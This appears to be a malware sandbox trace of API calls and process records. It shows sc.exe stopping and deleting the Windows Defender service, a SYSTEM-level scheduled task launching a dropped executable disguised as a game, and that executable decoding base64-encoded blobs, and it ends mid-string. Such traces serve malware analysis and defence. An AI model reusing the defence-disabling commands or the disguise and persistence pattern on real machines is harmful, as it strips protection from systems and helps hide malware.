	[0055.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fe58 | out: lpSystemTimeAsFileTime=0x14fe58*(dwLowDateTime=0xc9c61a0, dwHighDateTime=0x1d50a6a)) 
	[0055.952] GetCurrentProcessId () returned 0x83c
	[0055.952] GetCurrentThreadId () returned 0x134
	[0055.952] GetTickCount () returned 0xa66895
	[0055.952] QueryPerformanceCounter (in: lpPerformanceCount=0x14fe50 | out: lpPerformanceCount=0x14fe50*=12979045394) returned 1
	[0055.953] GetModuleHandleA (lpModuleName=0x0) returned 0xec0000
	[0055.953] __set_app_type (_Type=0x1) 
	[0055.953] __p__fmode () returned 0x770231f4
	[0055.953] __p__commode () returned 0x770231fc
	[0055.953] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xec79c7) returned 0x0
	[0055.953] __wgetmainargs (in: _Argc=0xec9020, _Argv=0xec9028, _Env=0xec9024, _DoWildCard=0, _StartInfo=0xec9034 | out: _Argc=0xec9020, _Argv=0xec9028, _Env=0xec9024) returned 0
	[0055.954] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0055.955] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0055.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0055.956] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23
	[0055.956] _wcsicmp (_String1="stop", _String2="query") returned 2
	[0055.956] _wcsicmp (_String1="stop", _String2="queryex") returned 2
	[0055.956] _wcsicmp (_String1="stop", _String2="start") returned 14
	[0055.956] _wcsicmp (_String1="stop", _String2="pause") returned 3
	[0055.956] _wcsicmp (_String1="stop", _String2="interrogate") returned 10
	[0055.956] _wcsicmp (_String1="stop", _String2="control") returned 16
	[0055.956] _wcsicmp (_String1="stop", _String2="continue") returned 16
	[0055.956] _wcsicmp (_String1="stop", _String2="stop") returned 0
	[0055.956] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x33f0c0
	[0055.959] OpenServiceW (hSCManager=0x33f0c0, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x33f020
	[0055.960] ControlService (in: hService=0x33f020, dwControl=0x1, lpServiceStatus=0x14fd54 | out: lpServiceStatus=0x14fd54*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x85, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1
	[0056.027] _itow (in: _Dest=0x20, _Radix=1375296 | out: _Dest=0x20) returned="20"
	[0056.027] _itow (in: _Dest=0x4, _Radix=1375344 | out: _Dest=0x4) returned="4"
	[0056.027] _itow (in: _Dest=0x0, _Radix=1375464 | out: _Dest=0x0) returned="0"
	[0056.027] _itow (in: _Dest=0x0, _Radix=1375440 | out: _Dest=0x0) returned="0"
	[0056.027] _itow (in: _Dest=0x0, _Radix=1375368 | out: _Dest=0x0) returned="0"
	[0056.027] _itow (in: _Dest=0x0, _Radix=1375320 | out: _Dest=0x0) returned="0"
	[0056.027] _itow (in: _Dest=0x0, _Radix=1375272 | out: _Dest=0x0) returned="0"
	[0056.027] _itow (in: _Dest=0x0, _Radix=1375392 | out: _Dest=0x0) returned="0"
	[0056.027] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x2f, dwLanguageId=0x0, lpBuffer=0x14fbc4, nSize=0x2, Arguments=0x14fbd4 | out: lpBuffer="♀4\x01") returned 0x15d
	[0056.029] GetFileType (hFile=0x7) returned 0x2
	[0056.029] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14fb98 | out: lpMode=0x14fb98) returned 1
	[0056.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x342640*, nNumberOfCharsToWrite=0x15d, lpNumberOfCharsWritten=0x14fbb4, lpReserved=0x0 | out: lpBuffer=0x342640*, lpNumberOfCharsWritten=0x14fbb4*=0x15d) returned 1
	[0056.030] LocalFree (hMem=0x342640) returned 0x0
	[0056.030] LocalFree (hMem=0x0) returned 0x0
	[0056.030] CloseServiceHandle (hSCObject=0x33f020) returned 1
	[0056.030] CloseServiceHandle (hSCObject=0x33f0c0) returned 1
	[0056.064] exit (_Code=0) 

Thread:
	id = 59
	os_tid = 0x8c0


Process:
	id = "21"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee17400"
	os_pid = "0x8e4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "18"
	os_parent_pid = "0xffc"
	cmd_line = "sc  delete WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 60
	os_tid = 0x8d0

	[0056.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbfbcc | out: lpSystemTimeAsFileTime=0xbfbcc*(dwLowDateTime=0xcf47480, dwHighDateTime=0x1d50a6a)) 
	[0056.527] GetCurrentProcessId () returned 0x8e4
	[0056.527] GetCurrentThreadId () returned 0x8d0
	[0056.527] GetTickCount () returned 0xa66ad6
	[0056.527] QueryPerformanceCounter (in: lpPerformanceCount=0xbfbc4 | out: lpPerformanceCount=0xbfbc4*=13036544912) returned 1
	[0056.528] GetModuleHandleA (lpModuleName=0x0) returned 0xb70000
	[0056.528] __set_app_type (_Type=0x1) 
	[0056.528] __p__fmode () returned 0x770231f4
	[0056.528] __p__commode () returned 0x770231fc
	[0056.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb779c7) returned 0x0
	[0056.528] __wgetmainargs (in: _Argc=0xb79020, _Argv=0xb79028, _Env=0xb79024, _DoWildCard=0, _StartInfo=0xb79034 | out: _Argc=0xb79020, _Argv=0xb79028, _Env=0xb79024) returned 0
	[0056.529] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0056.531] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0056.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0056.531] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8
	[0056.531] _wcsicmp (_String1="delete", _String2="query") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="queryex") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="start") returned -15
	[0056.531] _wcsicmp (_String1="delete", _String2="pause") returned -12
	[0056.531] _wcsicmp (_String1="delete", _String2="interrogate") returned -5
	[0056.531] _wcsicmp (_String1="delete", _String2="control") returned 1
	[0056.531] _wcsicmp (_String1="delete", _String2="continue") returned 1
	[0056.531] _wcsicmp (_String1="delete", _String2="stop") returned -15
	[0056.531] _wcsicmp (_String1="delete", _String2="config") returned 1
	[0056.531] _wcsicmp (_String1="delete", _String2="description") returned -7
	[0056.531] _wcsicmp (_String1="delete", _String2="failure") returned -2
	[0056.531] _wcsicmp (_String1="delete", _String2="privs") returned -12
	[0056.531] _wcsicmp (_String1="delete", _String2="failureflag") returned -2
	[0056.531] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16
	[0056.531] _wcsicmp (_String1="delete", _String2="sidtype") returned -15
	[0056.531] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12
	[0056.531] _wcsicmp (_String1="delete", _String2="qc") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="qdescription") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="qfailure") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="qprivs") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13
	[0056.531] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13
	[0056.532] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13
	[0056.532] _wcsicmp (_String1="delete", _String2="showsid") returned -15
	[0056.532] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13
	[0056.532] _wcsicmp (_String1="delete", _String2="querylock") returned -13
	[0056.532] _wcsicmp (_String1="delete", _String2="lock") returned -8
	[0056.532] _wcsicmp (_String1="delete", _String2="delete") returned 0
	[0056.532] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2af0c8
	[0056.536] OpenServiceW (hSCManager=0x2af0c8, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x2af028
	[0056.537] DeleteService (hService=0x2af028) returned 1
	[0056.541] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xbfaf8, nSize=0x2, Arguments=0xbfb04 | out: lpBuffer="♈+ﮔ\x0b榳·ᰐ·") returned 0x1c
	[0056.543] GetFileType (hFile=0x7) returned 0x2
	[0056.543] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xbfacc | out: lpMode=0xbfacc) returned 1
	[0056.543] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2b2648*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xbfae8, lpReserved=0x0 | out: lpBuffer=0x2b2648*, lpNumberOfCharsWritten=0xbfae8*=0x1c) returned 1
	[0056.544] LocalFree (hMem=0x2b2648) returned 0x0
	[0056.544] LocalFree (hMem=0x0) returned 0x0
	[0056.544] CloseServiceHandle (hSCObject=0x2af028) returned 1
	[0056.544] CloseServiceHandle (hSCObject=0x2af0c8) returned 1
	[0056.629] exit (_Code=0) 

Thread:
	id = 61
	os_tid = 0x8d4


Process:
	id = "22"
	image_name = "taskeng.exe"
	filename = "c:\\windows\\system32\\taskeng.exe"
	page_root = "0x7ee172c0"
	os_pid = "0x590"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "created_scheduled_job"
	parent_id = "15"
	os_parent_pid = "0xfac"
	cmd_line = "taskeng.exe {3D755262-8624-4E51-9122-E479D5160727} S-1-5-21-3727408139-63090477-3136880571-1000:ZGW5TDPU\\2XC7u663GxWc:Interactive:Highest[1]"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 71
	os_tid = 0xea0


Thread:
	id = 72
	os_tid = 0xbe4


Thread:
	id = 73
	os_tid = 0x7bc


Thread:
	id = 74
	os_tid = 0x59c


Thread:
	id = 75
	os_tid = 0x598


Thread:
	id = 76
	os_tid = 0x594


Process:
	id = "23"
	image_name = "taskeng.exe"
	filename = "c:\\windows\\system32\\taskeng.exe"
	page_root = "0x7ee17380"
	os_pid = "0x914"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "created_scheduled_job"
	parent_id = "15"
	os_parent_pid = "0xfac"
	cmd_line = "taskeng.exe {E6ACF615-28B7-4794-9E2D-7B8DC4832D2F} S-1-5-18:NT AUTHORITY\\System:Service:"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 77
	os_tid = 0x91c


Thread:
	id = 78
	os_tid = 0x920


Thread:
	id = 79
	os_tid = 0x188


Thread:
	id = 80
	os_tid = 0x15c


Thread:
	id = 81
	os_tid = 0x12c


Thread:
	id = 82
	os_tid = 0x138


Thread:
	id = 83
	os_tid = 0x1e4


Process:
	id = "24"
	image_name = "tadiapce.exe"
	filename = "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe"
	page_root = "0x7ee17460"
	os_pid = "0x214"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "23"
	os_parent_pid = "0x914"
	cmd_line = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 129
	os_tid = 0x264

	[0084.508] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0084.508] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0084.509] GetEnvironmentStrings () returned 0x1df900*
	[0084.509] GetCommandLineA () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0084.509] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0084.509] GetProcAddress (hModule=0x400000, lpProcName="___CPPdebugHook") returned 0x40e13c
	[0084.509] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0084.509] GetProcAddress (hModule=0x400000, lpProcName="___CPPdebugHook") returned 0x40e13c
	[0084.509] GetACP () returned 0x4e4
	[0084.509] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12ff14 | out: lpCPInfo=0x12ff14) returned 1
	[0084.509] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76b10000
	[0084.509] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0084.509] GetProcAddress (hModule=0x76b10000, lpProcName="Borland32") returned 0x0
	[0084.509] GetVersionExA (in: lpVersionInformation=0x12fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x12fde8, dwMinorVersion=0x0, dwBuildNumber=0x12ff78, dwPlatformId=0x7734e0ed, szCSDVersion="\x96\xaa\xde") | out: lpVersionInformation=0x12fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.510] GlobalMemoryStatus (in: lpBuffer=0x12feb4 | out: lpBuffer=0x12feb4) 
	[0084.510] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x1) returned 0x640000
	[0084.510] VirtualAlloc (lpAddress=0x640000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x640000
	[0084.510] VirtualAlloc (lpAddress=0x641000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x641000
	[0084.510] VirtualAlloc (lpAddress=0x642000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x642000
	[0084.510] VirtualAlloc (lpAddress=0x643000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x643000
	[0084.510] VirtualAlloc (lpAddress=0x644000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x644000
	[0084.511] VirtualAlloc (lpAddress=0x645000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x645000
	[0084.511] VirtualAlloc (lpAddress=0x646000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x646000
	[0084.511] VirtualAlloc (lpAddress=0x647000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x647000
	[0084.511] VirtualAlloc (lpAddress=0x648000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x648000
	[0084.511] VirtualAlloc (lpAddress=0x649000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x649000
	[0084.511] VirtualAlloc (lpAddress=0x64a000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x64a000
	[0084.511] VirtualAlloc (lpAddress=0x64b000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x64b000
	[0084.511] VirtualAlloc (lpAddress=0x64c000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x64c000
	[0084.511] VirtualAlloc (lpAddress=0x64d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x64d000
	[0084.512] VirtualAlloc (lpAddress=0x64e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x64e000
	[0084.512] VirtualAlloc (lpAddress=0x64f000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x64f000
	[0084.512] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6420a0, nSize=0xff | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0084.512] SetHandleCount (uNumber=0x32) returned 0x32
	[0084.512] GetStartupInfoA (in: lpStartupInfo=0x12fee4 | out: lpStartupInfo=0x12fee4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) 
	[0084.512] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0084.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0084.512] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0084.512] GetFileType (hFile=0x0) returned 0x0
	[0084.512] GetFileType (hFile=0x0) returned 0x0
	[0084.512] GetFileType (hFile=0x0) returned 0x0
	[0084.512] GetStartupInfoA (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) 
	[0084.513] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0084.513] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
	[0084.513] LoadIconA (hInstance=0x400000, lpIconName=0x71) returned 0x0
	[0084.513] RegisterClassA (lpWndClass=0x12fe9c) returned 0xc062
	[0084.513] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x72, hWndParent=0x0, lpDialogFunc=0x40308c, dwInitParam=0x0) returned 0xffffffff
	[0084.513] AdjustWindowRect (in: lpRect=0x12fe70, dwStyle=0xa0000, bMenu=0 | out: lpRect=0x12fe70) returned 1
	[0084.513] CreateWindowExA (dwExStyle=0x0, lpClassName="Squirrel Shootout by Brenton Andrew Saunders", lpWindowName="Squirrel Shootout by Brenton Andrew Saunders", dwStyle=0xa0000, X=-2147483648, Y=-2147483648, nWidth=576, nHeight=576, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20038
	[0084.514] DefWindowProcA (hWnd=0x20038, Msg=0x24, wParam=0x0, lParam=0x12fa40) returned 0x0
	[0084.514] DefWindowProcA (hWnd=0x20038, Msg=0x81, wParam=0x0, lParam=0x12fa04) returned 0x1
	[0084.514] DefWindowProcA (hWnd=0x20038, Msg=0x83, wParam=0x0, lParam=0x12fa60) returned 0x0
	[0084.514] timeGetTime () returned 0xa6cee5
	[0084.514] GetClientRect (in: hWnd=0x20038, lpRect=0x43d8d0 | out: lpRect=0x43d8d0) returned 1
	[0084.514] GetDC (hWnd=0x20038) returned 0x5010204
	[0084.514] CreateCompatibleDC (hdc=0x0) returned 0x6010207
	[0084.514] CreateCompatibleDC (hdc=0x5010204) returned 0x6010201
	[0084.515] CreateCompatibleBitmap (hdc=0x5010204, cx=570, cy=548) returned 0x8050200
	[0084.519] LoadBitmapA (hInstance=0x400000, lpBitmapName=0x6f) returned 0x0
	[0084.519] CreateFontA (cHeight=48, cWidth=0, cEscapement=0, cOrientation=0, cWeight=600, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x2, iClipPrecision=0x1, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Comic Sans MS") returned 0x20a0208
	[0084.519] SelectObject (hdc=0x6010201, h=0x20a0208) returned 0x18a002e
	[0084.519] SetTextColor (hdc=0x6010201, color=0xff0000) returned 0x0
	[0084.519] SetBkMode (hdc=0x6010201, mode=1) returned 2
	[0084.519] SelectObject (hdc=0x6010201, h=0x8050200) returned 0x185000f
	[0084.519] GetStockObject (i=0) returned 0x1900010
	[0084.519] FillRect (hDC=0x5010204, lprc=0x43d8d0, hbr=0x1900010) returned 1
	[0084.519] GetKeyState (nVirtKey=144) returned 0
	[0084.519] SetTimer (hWnd=0x20038, nIDEvent=0x1, uElapse=0x1, lpTimerFunc=0x0) returned 0x1
	[0084.519] SetTimer (hWnd=0x20038, nIDEvent=0x2, uElapse=0x32, lpTimerFunc=0x0) returned 0x2
	[0084.519] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0084.520] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0084.524] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0084.524] CryptStringToBinaryA (in: pszString="nVjayBLYXNwZXJza3k=", cchString=0x13, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fed0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fed0, pdwSkip=0x0, pdwFlags=0x0) returned 0
	[0084.524] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0084.524] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0084.524] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0084.524] CryptStringToBinaryA (in: pszString="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